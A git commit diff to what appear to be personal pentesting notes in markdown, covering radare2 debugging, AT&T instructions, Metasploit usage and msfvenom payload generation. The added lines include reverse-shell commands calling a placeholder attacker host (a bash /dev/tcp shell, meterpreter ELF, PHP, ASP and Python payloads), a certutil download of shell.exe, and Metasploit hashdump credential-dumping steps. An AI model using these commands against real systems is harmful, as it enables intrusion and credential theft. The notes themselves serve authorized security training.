bump

2021-09-27 00:48:14 +02:00 · 2021-09-27 00:48:14 +02:00 · 3800d3b247
parent 6788e7fb7e
commit 3800d3b247
4 changed files with 83 additions and 8 deletions
--- a/exploit/binaries/r2.md
+++ b/exploit/binaries/r2.md
@ -1,7 +1,7 @@
 # Radare2

 ## Usage
-### Dynamic
+### Debug
 ```sh
 r2 -d <binary>
 ```
@ -25,7 +25,27 @@ px @rbp-0x4
 ```sh
 dc
 ``` 
+* Step
+```sh
+ds
+```
 * Show registers
 ```sh
 dr
 ```
+* Restart
+```sh
+ood
+```
+
+## AT&T Instructions
+* leaq src, dst: this instruction sets dst to the address denoted by the expression in src
+* addq src, dst: dst = dst + src
+* subq src, dst: dst = dst - src
+* imulq src, dst: dst = dst * src
+* salq src, dst: dst = dst << src 
+* sarq src, dst: dst = dst >> src
+* xorq src, dst: dst = dst XOR src
+* andq src, dst: dst = dst & src
+* orq src, dst: dst = dst | src
+
--- a/metasploit.md
+++ b/metasploit.md
@ -49,3 +49,26 @@ search portscan
 * Show `hosts`
 * Show `services`
 * Set RHOST values via `hosts -R`
+
+## Exploits
+* `show targets`
+* `show payloads`
+
+## Reverse Shells
+* Multihandler, set options
+```sh
+use exploit/multi/handler
+set payload <payloadhandler>
+```
+* Shellshock as an example
+```sh
+use multi/http/apache_mod_cgi_bash_env_exec
+```
+
+## Post Exploitation
+* Windows
+    * `load kiwi`
+    * `hashdump`
+* Linux
+    * `use post/linux/gather/hashdump`
+
--- a/pentesting.md
+++ b/pentesting.md
@ -1,4 +1,5 @@
 # Pentesting
+* [Pentesting Execution Standard](http://www.pentest-standard.org/index.php/Main_Page)
 Authorized audit of security systems of computers and networks.
 * [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?)
    * Permissions
--- a/reverse_shells/docs/msfvenom.md
+++ b/reverse_shells/docs/msfvenom.md
@ -1,11 +1,21 @@
 # msfvenom usage

-```msfvenom -p <payload> <options>```
+```
+msfvenom -p <payload> <options>
+```

 * syntax
-```<OS>/<arch>/<payload>```
-    * stageless ```linux/x86/shell_reverse_tcp```
-    * staged ```linux/x86/shell/reverse_tcp```
+```
+<OS>/<arch>/<payload>
+```
+    * stageless 
+    ```
+    linux/x86/shell_reverse_tcp
+    ```
+    * staged 
+    ```
+    linux/x86/shell/reverse_tcp
+    ```

 ## Windows
 ### x64 Reverse Shell in exe format
@ -44,12 +54,33 @@ certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port>/shell.exe

 ## Unix
 ### netcat reverse 
-```msfvenom -p cmd/unix/reverse_netcat LHOST=<listen-ip> LPORT=<liste-port> R```
+```sh
+msfvenom -p cmd/unix/reverse_netcat LHOST=<listen-ip> LPORT=<liste-port> R
+msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker-IP> LPORT=<Port> -f elf -o shell.elf
+```

 * Alternatively, not msfvenom
-```bash -c "bash -i >& /dev/tcp/<listen-ip>/<listen-port> 0>&1"```
+```sh
+bash -c "bash -i >& /dev/tcp/<listen-ip>/<listen-port> 0>&1"
+```

 ### Include into Python Exploit as hex
 ```sh
-msfvenom -p windows/shell_reverse_tcp LHOST=10.9.7.193 LPORT=4444 EXITFUNC=thread -b "\x00" -f py
+msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4444 EXITFUNC=thread -b "\x00" -f py
+```
+
+## PHP
+```sh
+msfvenom -p php/reverse_shell LHOST=<attacker-IP> lPORT=4444 -f raw > reverse_shell.php
+```
+* Enclose raw file inside `<?php ... ?>` tags
+
+## ASP
+```sh
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f asp -o rev_shell.asp
+```
+
+## Python
+```sh
+msfvenom -p cmd/unix/reverse_python LHOST=<attacker-IP> LPORT=<attacker-Port> -f python -o reverse_shell.python
 ```